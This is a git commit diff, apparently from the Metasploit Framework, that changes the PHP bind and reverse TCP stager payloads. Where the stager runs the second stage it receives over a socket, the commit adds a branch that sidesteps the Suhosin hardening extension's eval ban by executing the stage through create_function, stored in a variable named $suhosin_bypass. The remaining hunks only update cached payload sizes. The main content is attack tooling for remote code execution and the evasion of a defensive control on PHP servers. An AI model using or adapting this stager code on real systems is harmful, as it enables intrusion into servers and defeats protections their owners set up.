Land rapid7#8952, suhosin compatibility added to staged payload

Brent Cook · Brent Cook · commit cad36ee14e26 · 2017-09-26T15:22:36.000-05:00
diff --git a/lib/msf/core/payload/php/bind_tcp.rb b/lib/msf/core/payload/php/bind_tcp.rb
@@ -109,7 +109,15 @@ def generate_bind_tcp(opts={})
 # Set up the socket for the main stage to use.
 $GLOBALS['msgsock'] = $s;
 $GLOBALS['msgsock_type'] = $s_type;
-eval($b);
+if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) 
+{ 
+  $suhosin_bypass=create_function('', $b); 
+  $suhosin_bypass(); 
+} 
+else 
+{ 
+  eval($b); 
+}
 die();^
   end
 
diff --git a/lib/msf/core/payload/php/reverse_tcp.rb b/lib/msf/core/payload/php/reverse_tcp.rb
@@ -102,7 +102,15 @@ def generate_reverse_tcp(opts={})
 # Set up the socket for the main stage to use.
 $GLOBALS['msgsock'] = $s;
 $GLOBALS['msgsock_type'] = $s_type;
-eval($b);
+if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) 
+{ 
+  $suhosin_bypass=create_function('', $b); 
+  $suhosin_bypass(); 
+} 
+else 
+{ 
+  eval($b); 
+}
 die();^
   end
 
diff --git a/modules/payloads/stagers/php/bind_tcp.rb b/modules/payloads/stagers/php/bind_tcp.rb
@@ -8,7 +8,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1188
+  CachedSize = 1338
 
   include Msf::Payload::Stager
   include Msf::Payload::Php::BindTcp
diff --git a/modules/payloads/stagers/php/bind_tcp_ipv6.rb b/modules/payloads/stagers/php/bind_tcp_ipv6.rb
@@ -8,7 +8,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1187
+  CachedSize = 1337
 
   include Msf::Payload::Stager
   include Msf::Payload::Php::BindTcp
diff --git a/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb b/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb
@@ -8,7 +8,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1361
+  CachedSize = 1511
 
   include Msf::Payload::Stager
   include Msf::Payload::Php::BindTcp
diff --git a/modules/payloads/stagers/php/bind_tcp_uuid.rb b/modules/payloads/stagers/php/bind_tcp_uuid.rb
@@ -8,7 +8,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1362
+  CachedSize = 1512
 
   include Msf::Payload::Stager
   include Msf::Payload::Php::BindTcp
diff --git a/modules/payloads/stagers/php/reverse_tcp.rb b/modules/payloads/stagers/php/reverse_tcp.rb
@@ -8,7 +8,7 @@
 
 module MetasploitModule
 
-  CachedSize = 966
+  CachedSize = 1116
 
   include Msf::Payload::Stager
   include Msf::Payload::Php::ReverseTcp
diff --git a/modules/payloads/stagers/php/reverse_tcp_uuid.rb b/modules/payloads/stagers/php/reverse_tcp_uuid.rb
@@ -8,7 +8,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1140
+  CachedSize = 1290
 
   include Msf::Payload::Stager
   include Msf::Payload::Php::ReverseTcp
